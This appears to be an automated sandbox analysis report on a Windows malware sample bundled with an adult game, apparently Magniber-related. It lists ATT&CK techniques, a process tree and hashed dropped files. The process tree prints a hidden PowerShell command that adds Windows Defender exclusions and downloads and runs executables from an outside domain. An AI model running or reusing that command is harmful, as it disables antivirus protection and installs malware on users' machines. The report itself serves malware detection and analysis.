205f00610ab36450d86ad8ebfe7a0f0af7aa757803503ea4de1f82c78e6dedd3

Analysis

max time kernel
15s
max time network
16s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
18-08-2024 00:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
Size

8.1MB
MD5

b07903a55bdb2c7ed7895fdeba690458
SHA1

00eb5c9e340664df33ea9369179de712bc5d0773
SHA256

205f00610ab36450d86ad8ebfe7a0f0af7aa757803503ea4de1f82c78e6dedd3
SHA512

cb5df616f85177175e4543b7cda2010275c935f527cfb17c3a384884e6de4dd00a8f676c8e437c9a303573c08419f2f5c8fc30058493ba49abecfd65cae81bef
SSDEEP

196608:B9ofsgFUjh5JMULHIEEUgILxbhVebH0h9HU5NHZlcP/VMfif:B9ofsuUjh5JMULHIEEUgILxbhVebH07H

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2492	Enkou_Succubus.exe

Loads dropped DLL 7 IoCs

pid	Process
3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
2492	Enkou_Succubus.exe
2492	Enkou_Succubus.exe
2492	Enkou_Succubus.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Enkou_Succubus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2676	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: 33	2684	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2684	AUDIODG.EXE
Token: 33	2684	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2684	AUDIODG.EXE
Token: SeDebugPrivilege	2676	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2492	Enkou_Succubus.exe
2492	Enkou_Succubus.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3036 wrote to memory of 2660	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	29
PID 3036 wrote to memory of 2660	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	29
PID 3036 wrote to memory of 2660	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	29
PID 3036 wrote to memory of 2660	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	29
PID 3036 wrote to memory of 2492	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	31
PID 3036 wrote to memory of 2492	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	31
PID 3036 wrote to memory of 2492	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	31
PID 3036 wrote to memory of 2492	3036	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	31
PID 2660 wrote to memory of 1092	2660	cmd.exe	32
PID 2660 wrote to memory of 1092	2660	cmd.exe	32
PID 2660 wrote to memory of 1092	2660	cmd.exe	32
PID 2660 wrote to memory of 1092	2660	cmd.exe	32
PID 1092 wrote to memory of 1776	1092	net.exe	33
PID 1092 wrote to memory of 1776	1092	net.exe	33
PID 1092 wrote to memory of 1776	1092	net.exe	33
PID 1092 wrote to memory of 1776	1092	net.exe	33
PID 2660 wrote to memory of 2676	2660	cmd.exe	34
PID 2660 wrote to memory of 2676	2660	cmd.exe	34
PID 2660 wrote to memory of 2676	2660	cmd.exe	34
PID 2660 wrote to memory of 2676	2660	cmd.exe	34

C:\Users\Admin\AppData\Local\Temp\2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Public\config.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Windows\SysWOW64\net.exe
    net session
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      System Location Discovery: System Language Discovery
      PID:1776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V3 -OutFile V3.exe;./V3.exe;Invoke-WebRequest https://jeuxviddeo.com/ifl1rm8lvhdlsfmmdc -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/nuc4dofedqp6mruigq -OutFile A.exe;./A.exe;exit
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- C:\Users\Public\Enkou_Succubus.exe
  "C:\Users\Public\Enkou_Succubus.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2492

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x17c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\ResourcesData\Audio\Blowjob_down.ogg

Filesize
18KB

MD5
e13e323d86f3be7db52b61b5d8efc5ae

SHA1
f9016fe6711d33820791470d94e44196a8a9ace8

SHA256
c553aae0d009c1a8f59918f3c3ade97955dd024cc3f1f1e6feaa57d691c4fce8

SHA512
c9da7d06f6a4e94014bdfa173fef33392e5a6e92107a53b100b59121854307fa33a258d502788b295e144436703670aa6391dac4e3516953e657b39b428c6486

Download Submit
C:\Users\Public\ResourcesData\Audio\Blowjob_end.ogg

Filesize
151KB

MD5
fadb2fd0f4187b1e708eeba667c282bb

SHA1
21a39158b161d95c23eb87722eed5132fc5ed89e

SHA256
2ae20ec6acd9572f018da7b37cd85b3a86158983a57e08cb789a8c29f177f3a8

SHA512
1040935289e51767b63253a41606d43c1a58c3c24eb5f4754444676e88636af5e9d6a4e8f7c734c4ec563c88b0247c02943183a0b4b77620195e5c7ebd3e32c9

Download Submit
C:\Users\Public\ResourcesData\Audio\Blowjob_start.ogg

Filesize
12KB

MD5
733b5f992a58f48f78f0efa7426c5f29

SHA1
98e2f1788d5bc9ba88f6a476e281adc90fd3304e

SHA256
8b68f4f7f2a1412f0d428992352eeeb57689d853c2544e88bc39b12d548f5c93

SHA512
6a1348b6f30a21784c97d06bf00cb1447dcf4473a2c32c9a1d36f4d6dbcd159b57f66b890b2afb4374aa6e0006f22aa3b1ee00b52c14636e8de29a7c78cd4942

Download Submit
C:\Users\Public\ResourcesData\Audio\Blowjob_up.ogg

Filesize
27KB

MD5
c550d7d2970ab6d2af28ae7bb3f9d7bc

SHA1
b751ff61c24d5e6806d87b7a09b70c4dfe2a70b6

SHA256
d2f5ccd7cba15925eb78c126f88324a2416fd275abc1821ccfbff2626486be71

SHA512
2a49963e4af4a1dbfd8002f8609d5ab8d61cb6c387117ecaf35a63ef7c978d213dd37635941500e2ebd8644d51a4ca66aa8cc4a8e2237bb4f3b9ef678f647324

Download Submit
C:\Users\Public\ResourcesData\Audio\Cowgirl_collision.ogg

Filesize
48KB

MD5
eb1a1f975de71e444823e79b6445c97d

SHA1
6c13d92a8383e44b8a143335366845cb8dbaa08a

SHA256
58769d7cab2982cd17173137dd2976b640624e14b29e6732ca4c478252de379e

SHA512
e56807a597a7214d2693402ac0addc2fbd6cafee201d966cac4b0d45f324dd238bcbbfe56d7e0a3a7c15cf40f1d4c84dddf4ab06e3adeafe559cb5ebea994ba5

Download Submit
C:\Users\Public\ResourcesData\Audio\Cowgirl_gasp.ogg

Filesize
18KB

MD5
f9a9e0a19810b3308d36bb77a5e84626

SHA1
8c120a409297ec7b0593c61e25584a604ca720df

SHA256
8923c0832fe0f9ee3a09aeed6a2fbfe4902159fc0f866de1f6e7bb2c735c7ea2

SHA512
077d36a07908ea2d13a3e942a5eda5cee63ceef3b327b86b8a862f80a44c37b25a24591143b559d196e7d238d600cdb5682db6e4d1256bcfed4ede1d3374e25e

Download Submit
C:\Users\Public\ResourcesData\Audio\Meta.ogg

Filesize
39KB

MD5
1655bfda376f8e70e5e80790828f495e

SHA1
fa4f92362e73562d462240b12cecb043e35a9b91

SHA256
3ff1999576f88a379d07d4df3f9aa7ec76bc89d52d30e92c72cdba109e0694a3

SHA512
3bb9347fbd864756c3c1f8afb42837fcf37109747f75e35dfda45215e23ca38f1c90abbb429ada5e390f80276e69dece0a6955551943b2640b0f9d92b9aa1d4c

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_collision.ogg

Filesize
10KB

MD5
b6502984bf4c92d148a15b9377952856

SHA1
68f9ae90c1bac6538bff8242be7daf34415ededa

SHA256
948dd672f8d8aa1ced2692317679b7ff8d23a223a9d3fb980480f52b434bfdda

SHA512
26744448ca71a28842c97579fdb9440c5b649d97beb430d6e4fdbfbbd5b21ef1c9de830befcce31175e82ab7d0cb58a24bfc7de4c4c6f854fed02056bbd08a78

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_cum.ogg

Filesize
19KB

MD5
3b91474097e34e6fbfc313ba77d1f153

SHA1
2fc01f5403525450e45d7408a54270aa3bb3aa0c

SHA256
3d730191bfe0a5881458af56f2c821077888aa6146063bb1717a61593d798cc7

SHA512
d748cbcf962d2e802bd00accdcc2e112d3c395b1b5c98ed11c8a995bc6c65bbb542be1dfcf61d0c865d697b07ac7e49bb9d6ed86600c7bf515ccdb39602ac074

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_friction.ogg

Filesize
27KB

MD5
aa3215ac125ea8c21ec4e82907065727

SHA1
8664cc20c11b2ed6a86395c399daf49567570c16

SHA256
cd45fe271cac4d459ee5169db16a8bbc4b84d242f4079c05897fb86ad1b9d5e4

SHA512
bd8f7311fe4f4269bfa207f5ae328c6d60e4bab14f72ad7ddaef0906cf53dd0125f03e50e0c24e13c5f65170dbc99a4aee9b0b273b2a14a9a33e78991a9b9b9a

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_1.ogg

Filesize
10KB

MD5
35e4579224d38d38835d5c9c0ebc0925

SHA1
a7c3f92ee7a897aa8386df58465393c028c7160e

SHA256
a60986d1222e72c784f594e9f01f34a8a4e2f481c49e065b7ff321ebc90d4a26

SHA512
9de018993fce36b13386a234e230dcca34a7b0784e855f2510267c9a40d5c70105af9d2dca7e95a520942d70c53ca7c744bbe391f3ad86bfca7610178adbfce0

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_2.ogg

Filesize
8KB

MD5
0753c17a244073a518f6559c688950b0

SHA1
c0e7bc93af20a0ed4f355c684549ce67b06ee4b0

SHA256
0628e9f636af8e61394931cba3e32ce6ee93cd89ac425c9f9d40c308bc690398

SHA512
10cf947020f48c04a92263d9311204608fb7a1a470536b4505eda9fa1fff12ca2c65607b1238d668d8f9157517c37a43b1e58d0d942613aefe0967e047f3af21

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_3.ogg

Filesize
8KB

MD5
66fb6fec58cdb558118bc3bd52e1f0b5

SHA1
0c3f660740c5ada176fb7f2ac95b139c3deffe5d

SHA256
64bc8fa5931997f9dbb822a06057bebbe313b6bad08a929cc62b21872541b827

SHA512
9cbd1f411835f2c9c71efedbf0ff4c3b893ca69c02f444beb27685a74c6f4aa7cc61575bac45cb0838575d5a6b335b5028427e199e4eec8bf6597909902597ae

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_4.ogg

Filesize
7KB

MD5
5529643e6d5ad1515d192907fafea220

SHA1
932fcbda8a579e2f37eaf1138e985318c9100045

SHA256
d6de3d5ccd9e99ef6781a4bc862199a9165b49e0196c560383ed869537721a43

SHA512
02b8920db70712557eb134b9b872a7df98a9a113ef34d0bdb917276d7436c28b9b01b292758a18ddb678ac48c984e198932c1dfb761693d004a44bd4404396c5

Download Submit
C:\Users\Public\ResourcesData\Sprite\Background-sheet.png

Filesize
105KB

MD5
0a505050c1cb69477cedab3833c33c30

SHA1
a07da42f06cb5687d6dcaf7550fd9e1dc8bb0cfb

SHA256
4d398757cf4220ebd5fc75fee67d8bd9e55efe4a580e78f05d693ef2295c2df3

SHA512
1228f8d3bcad7e19f93d4b81a60ad12e61cdd623bec79003bc4e4454d37070c0e908068909ba02888c9e0ca95be45e6abe523188710e81be0d4f892f5af28a9d

Download Submit
C:\Users\Public\ResourcesData\Sprite\Background.json

Filesize
4KB

MD5
3c3f6436ea377bb39872888466200152

SHA1
0bc73671f602bba5f1b6c4cb28afce509bb4ee59

SHA256
411340ba1c537b53c29d9a7b2e6da2bfafb7867e57835d44cf1b94827947d9f7

SHA512
96575577febbef2bc1c5e7776f5ce164f7246f4c7eb9b6a5bb3e5e74c46d8fde5bc3541e07e0c74c0af729905d64ce133c1a7e9d7d73415cbd8ac4d188827d24

Download Submit
C:\Users\Public\ResourcesData\Sprite\Blowjob-sheet.png

Filesize
164KB

MD5
3c38588559f70b4df7754befce6cdc86

SHA1
fed72e8c7f83126fc4dd7bc3bbecf3a2b36355db

SHA256
3c52873173de4bade927cf53b0be618ea9546747e4b1aa36913838ab71b4382e

SHA512
dd06a7c302da6d0c8323b2acdd244bfb1f1f7902835a0806da835347254f697ab6dd86aaee4c1a15c909f81f2b469a3aec5c613c6b218323c787177fc02b41c8

Download Submit
C:\Users\Public\ResourcesData\Sprite\Blowjob.json

Filesize
19KB

MD5
3d8e847a6b4c1f1f70638b2b78d0806b

SHA1
3561828a08e923449d0d2468296648e6871a6830

SHA256
c8fffd47d62fc6be7f63c4a183a6a3ae781a1514f528959511cf7dd8bce0c24f

SHA512
855da9fbaa8b8cb5d50b093957ad34be64ae5331c97c68788a6df27d13b127a5562c0c2ea583aaed2960db7dfba5adbeef15427e3f6fb51d0068577673ef1038

Download Submit
C:\Users\Public\ResourcesData\Sprite\Button-sheet.png

Filesize
416B

MD5
ebc707659e15de88766063d51a49bee5

SHA1
9ac62070e0e84bb3eafa7b9dd643699a3defdfd3

SHA256
2a87641381215e8bb240816413908edb3228ee28a823fd02fc4c71f53713b7ec

SHA512
3d3bd73865e9fd5e58d15b17050cc2bc87deda1d602da03f5612977ebbd1754e5f9dbd9d809a724d83841d2ed3be8e3747adffc83210464b35967f723f689efc

Download Submit
C:\Users\Public\ResourcesData\Sprite\Button.json

Filesize
922B

MD5
eac75c1f6d27eea3dbe9970e26347a9d

SHA1
0909f674f8b166841c05d420e12dbcfd104bebdd

SHA256
c62d72e242a086f5aac2142c279d1946f3adae09192dbbf318c55f1ff19ae8f5

SHA512
fb0095f7faacce2433183afafff951d7455577abede43ea9cf95906b96de2e5c020e013e2ff7c02e2e02e627489218506bdc50ac293c4cc56b67b4ff010959f0

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_frame-sheet.png

Filesize
724B

MD5
8574cd70285c47f80827167734db5f2c

SHA1
8112d629818c04aa1abc7d1b22b8e9d33395b599

SHA256
daa0ffa07077e3be33b1a64b6ca3ca01db0dae2ae234b6659ad90b483913b546

SHA512
c2b8d1b6f08762ef70e545161dc684c5f836213c5c3f2d63775380addabbfde28e242b4b1662272a42f07123294da77dd60fe9f997bc3f76e998cca91defcb45

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_frame.json

Filesize
947B

MD5
4b21d2428fe66d914f01a39eae1469ac

SHA1
83e343a51d6442c3647042713e35e55c8b40467b

SHA256
9caa7a8da520224d0c7fd6c409930e89cd4838f1743cf5f0185cd22dd863dd52

SHA512
2489e745fbf4e0ff66f98b517c3b8f1259e6559e011a9068fbf7340bb60d4cf42214cdd47c8127cf8a94be637d530ba7ec102856292af74cc4294d739b73b05c

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp-sheet.png

Filesize
5KB

MD5
5036a88b9aba929ca7dcd0baff9bcbfa

SHA1
598a3543e91b4a2a90f750ddd2ab2111c51239e0

SHA256
6aa2fc94c41ce9ec967cf957e1a28d4c7f88b2b293566cd2e09519f90458f2ba

SHA512
143c1eb6962c94ab4b284732eb8df4f77711fa67aa80e58d72923336c1bcbfa59b62323861ebd66bd31335ce06f4a347bee2bfa3dc20f5a04ab16edc2f0bf669

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp.json

Filesize
1KB

MD5
ff01cd3e6acae43c67267ff3a899c299

SHA1
59d4521196a11035ebf1addcc4949d40ac0a7a31

SHA256
b0dc18db31b014fa6801ab88d6caa6bb37e49cffdca1d90061d0f922ae40255a

SHA512
320cbe15fe32ff74b6d4fc1855d400b4fef0674edb63caaaef562c7abfcd4cd482c09c9ccd73e16ffd80409c30d0f7d72f5d49f6cb01b20c08f2b41501371568

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp_l-sheet.png

Filesize
5KB

MD5
f2bdb5146b60f010e51a432e3d2c158d

SHA1
d5070f27c4ec8aa8924d13eb4af12d4fcaa9d50f

SHA256
8485d7f54a0eaefc21404abb1bde6fc00f51d53d205b5d5fe622ac7b610506d3

SHA512
4edc444947544eb5a6224bf90959d9aacc6682afe276128b028ab67bda3a21e8b82d3f43005a3d95e2d6f10ccdcc345e62ef6151acd009fbaafaf6344f5c318c

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp_l.json

Filesize
1KB

MD5
4ab5834e8a85aa2d5a931042208165ac

SHA1
6c2b2b25139da96832a984bf640fa674f3403b24

SHA256
c48e054f21e43ab746e4fde83aeb2f9473e7b7fdf3850c5b0fa40b7fcb1258c1

SHA512
6cb7cbe695c4a0bd8457f09ac552fdfc4047903d5c573107094742ed4333e13da685d8716aae1a7930dbf447bb597705c5dcd29aa9bf58fd5e066d9c1c074b79

Download Submit
C:\Users\Public\ResourcesData\Sprite\Cowgirl-sheet.png

Filesize
71KB

MD5
effcb1a24cb53b09bc87a69953856131

SHA1
9ea5123bd7ab23f3c65e18ae7a4d5526ce5eaa96

SHA256
fe96918d0fa882ca2cb105aa9645741f3e42324f84128b317d0217236568c46a

SHA512
d9ff44831ecded82152e78a596e25fb0fe7a557c8ef3edc564f286c8f5e567cfd88b96a58abc8c3af029364d78d5327e9956cbb98794b2541f370cd6bab34fba

Download Submit
C:\Users\Public\ResourcesData\Sprite\Cowgirl.json

Filesize
18KB

MD5
29cae2e2a6eaef571b1cf76a0e23b4a7

SHA1
350d007c50a683f146f38a5f7e1ce65c5dea4cab

SHA256
f7ea349068a56f94922268481153a21e7414d8236e64d114e047f311b10e051f

SHA512
eabfb429890f22e8365e6bb4e66003cc38a35cdc76a1d4819ba44bf16ab183dac88c615bb1dc4a23f6f08a1f923bf297405a5b518cd776c1c4cc65494ee9a51a

Download Submit
C:\Users\Public\ResourcesData\Sprite\Hotel_BG.png

Filesize
10KB

MD5
593b69d71901e909a4674a2fb0ecdf25

SHA1
54ef6bc91bb87402bd7956f2111bfb0495ad771c

SHA256
88ee16187935cb0aca7ac604ae97852647eae7c8256fdcd18e71274e3bb42283

SHA512
9a3967ee1b110a81119ea2fa5844e44d19293b199bc924cd33429483ef780b98c6ebb97ff3401c39de08b0f5a7b198f4ee5854e9497dab608ab0dc6978f1d0fa

Download Submit
C:\Users\Public\ResourcesData\Sprite\MetaCG-sheet.png

Filesize
62KB

MD5
154832b0311a1c3acfa6e1fbf01b9eb3

SHA1
2522471db880172bef82d47ab283cb7d57b1b9cc

SHA256
72175466f8b4700014e6517354d8cf95cec8fedd2d62947134a36326021c2cfd

SHA512
8da3e3b56b6a010142ffaac65a5f5506001be2b4d7152d46b8f61e02186b6772f6220d46bbb4fe681b06648de38c6ea849450588993674f4f02f49af542111fd

Download Submit
C:\Users\Public\ResourcesData\Sprite\MetaCG.json

Filesize
4KB

MD5
af29816b55136c201e7af3f5da99bbb4

SHA1
0f3fc3fe98f10ec5bd1c777705c06836a9ce7bd9

SHA256
63e5083ecdf583b5684a893c1e46752737e820383c94ab08c51126fc62d2de88

SHA512
be50a0416c891e57c7b49e1787d16857964b2c592f96892e81392c838473903d47e23f044d8a82e4c6cc87b4a6e57975595135a13e2acb5efd875f6da01ece26

Download Submit
C:\Users\Public\ResourcesData\Sprite\MouseTip-sheet.png

Filesize
803B

MD5
f2b38384384fab69bde4baaeb51367f3

SHA1
aa1ba21fbecd486355fcc44c1ce5d20250e96dfe

SHA256
8684e310b04d6abe261423a5987fdbb48ae8e71e041fa2452fd4e5448237f498

SHA512
8e5e99cd756f2605a83f3f9f83e41b9c69f7c97cb60900a649ac0b9ae448dea6745359831593617b9ab822e09b04782c7d1e47a6fb63dbca10640e0e2a30e730

Download Submit
C:\Users\Public\ResourcesData\Sprite\MouseTip.json

Filesize
1KB

MD5
70c76e98cccc31ba0f675e54300eec2a

SHA1
4030f358ced53be2ca946915dbec9caba43134eb

SHA256
44ad8bd0368f6df7eedc71e58c37e88fc5e7672a9ddf73edca0ffcbce4139e0a

SHA512
b254ab81f230b11319a40941276cad013209ef14c4d9af93996fc0341081dff58d67d22b6ba855927dafd4ecfbc5f2b0dc3fb273ab88780f81aefc7e92124f45

Download Submit
C:\Users\Public\ResourcesData\Sprite\Paizuri-sheet.png

Filesize
355KB

MD5
28734942940187b95083ccb43d25c83d

SHA1
bcc206f46bae33d212b0d25e25e2bec127219987

SHA256
904789b53990eb0acfa193ac87485853c2d52211d52a9612fbb9405c02172559

SHA512
af25c2cb62bd592aa11e4c0d384c57d97a9a6b8dae7d4b1e1ac3335b240b4185ff4fa2fadae98c51ccadfeba0f84c7be56b7701aaee1e9340ddaabc6d8c3cf00

Download Submit
C:\Users\Public\ResourcesData\Sprite\Paizuri.json

Filesize
67KB

MD5
02d6708d7d745e61787b784914b36082

SHA1
520f1615f467bbce6de87e7310754c28eb03f5a2

SHA256
676982f4107af90e6acc3653482b1dc148f4b9924b9c1521d4cf4039f8f8e31a

SHA512
bc9b2df96b45e4bee9f208db9bc4106b559d55c6d84c083bd86be4facec2958cd83e3a577601a5ac7f1fa9a97e1e092cdae7660dc0cf7cdc542b3f1d1b941744

Download Submit
C:\Users\Public\ResourcesData\Sprite\Street_BG.png

Filesize
10KB

MD5
fc4342a07e072209dd3f5dd775e47085

SHA1
076fbac57ff1eaba64886c3c5cdc52266dfcd857

SHA256
5ea6425a4c81f2d60843aed74b080a3ebb0c82fa83e88cec6426fe77532c6800

SHA512
29000a77c69f0cc9a675b5eb8f1fcacc3050892d7388803956bdd39f960131e36aa298613c42ffca1258c1b58df3016e46433c7a83851fb1bf4e339a01753244

Download Submit
C:\Users\Public\ResourcesData\Sprite\textbox.png

Filesize
516B

MD5
dfc0e0df4b6980450a1db2ad9755e2f0

SHA1
ceebafcbeef2a49cbbd131e805dde3f1219645d1

SHA256
d6a45e73410ed028912581dc0c13d941546f24796a860c4463b82813b4df0333

SHA512
7f6765526f93855c26312fdfec14010611d694ea65eb5ee049f4d06a2a7c096e4ed672160b3d223a3e0268fbf227e21cf99c1b85d6d9e557aa72630a7ef3792d

Download Submit
C:\Users\Public\ResourcesData\Text\dialogue_text.json

Filesize
7KB

MD5
800fbff2d044a06e14b31d49086886fa

SHA1
a28118016f36df761c7396b2ed4aafaf05d6ff9b

SHA256
597a4317fbc3433f62fb97a9b28bb2ac99d038c7529af71b3cc346c26123ba7a

SHA512
2154ed5dbf20083c848ed5aaccf42231006f342d0ac7b737bf54091461dacdcac140bb10e6eb5f1bb1c9f5882c8c0067feeda018cf2bda0440fa6255fbb399f8

Download Submit
C:\Users\Public\config.bat

Filesize
593B

MD5
67babfd11986db3fad24bb95603f7343

SHA1
018c9dd244f1ee7feb0d58a60aa3bf6320405a35

SHA256
77f93618988472394b5feeadd426a62cfb8e9a1e2a1ca891e76fa66584e31950

SHA512
7ce17b373518053fc88526b63e4421111bee51d0699a43f5c1e63f219978a9007a591ea42498d826afc285b471d274c7df8c9f3750538ac4308d17c0feb6c26b

Download Submit
C:\Users\Public\data.win

Filesize
559KB

MD5
ca6176352fc32ca64769364a0227ed1b

SHA1
e1d4c39125f1f04bbf8f0f889c2f23831cbd1abb

SHA256
8ad9edc24d56453b5961dc97c80bd17f394fc300464d96979fe1302d963a087e

SHA512
6ca01ccaa18b6b7c6cb50bee9db6a7013903709a8d1022a22553e4ca55d98146963efee33682500f1d719ed57514e888b78c507566c9e740f4914df1670a7ffe

Download Submit
C:\Users\Public\options.ini

Filesize
96B

MD5
db94e9c99808f88011644ba34d993ff6

SHA1
fadfdde548d7875e59a6c3ef4387995ff70edb9e

SHA256
74518f2550169c01089c2bf4e80fa73ee555ad21dca50d92ba061648fac0e0ef

SHA512
b15932a92905f525d92b81aeb823c58701c638b76188da148bb30a035629ad34cc5d6c778914ad8d9b6bc024fbf06bf300eb3887edbbd4a277bcd16c3a1c45a3

Download Submit
\Users\Public\Enkou_Succubus.exe

Filesize
4.7MB

MD5
c6dcdafaf55947371fac40c998682674

SHA1
434ab04881d558d85b8f8efb421efa6efa65289a

SHA256
49dcf097ce9e73f035ce561823d90a1f6988a9daf30dc03a78b5e28ed659296a

SHA512
dcaf4165cefefada6b175bf4cecfb80decf6b139749db24ae60fdec635be8d60701e4a230f22cc4bd8f50c6524a5e35e0da378ce12b153975c6b3451db5d137b

Download Submit
\Users\Public\display_measure.dll

Filesize
73KB

MD5
4a10d0890322cf89cd08282a80c8d2e7

SHA1
e38b6374f17415d5f53611b08cf790fc652e2999

SHA256
048b8d07b3399761e8d2b32adf7db6c4563d8bba018ae741da26eecd324e5295

SHA512
343b3527d76d45d8416538444b971ce18a13231b8b6fa8144f91c7ee2f1e7ed2db8f975a6d0ad07b6449e1c5701a71923768805290805b24df8c6a5a2dd148bc

Download Submit
\Users\Public\display_screenshot.dll

Filesize
76KB

MD5
c4aa222bd80161a582a73bd8111148b1

SHA1
ac0ce00aa48598434151c5f0333d95337a29e27e

SHA256
8e1e23eac5672d477fa597c8641c5e55cf2f2fb28bade9703136f3f1ec56748a

SHA512
11989b5120367e8793c4bb75d8dd20d7e66dd7aaa1054852f9225c36c362547c90265290c5e2dba47a69bbc4f14682ecaa64ce963861c1484080521d485fa85d

Download Submit
\Users\Public\window_progress.dll

Filesize
69KB

MD5
eb7466e9de3128dc4a61a26c9d6f93a9

SHA1
715d1880e5754f1f3adbea0a345b207c42b2a267

SHA256
e46f0252dee3d206f4e453c9ba351a1e85249014d10bdcfb6aaafc388e2731e7

SHA512
7b6b3f0034dfe4f610f0726128a2118b6f5488bfa7d11f4e2f7c5ba677f584d01f1d7abc7788abb6b63df5a86181660ec4831e7dd870b5fa4c8ad6d065a6aa60

Download Submit
memory/2492-184-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

Filesize
64KB

Download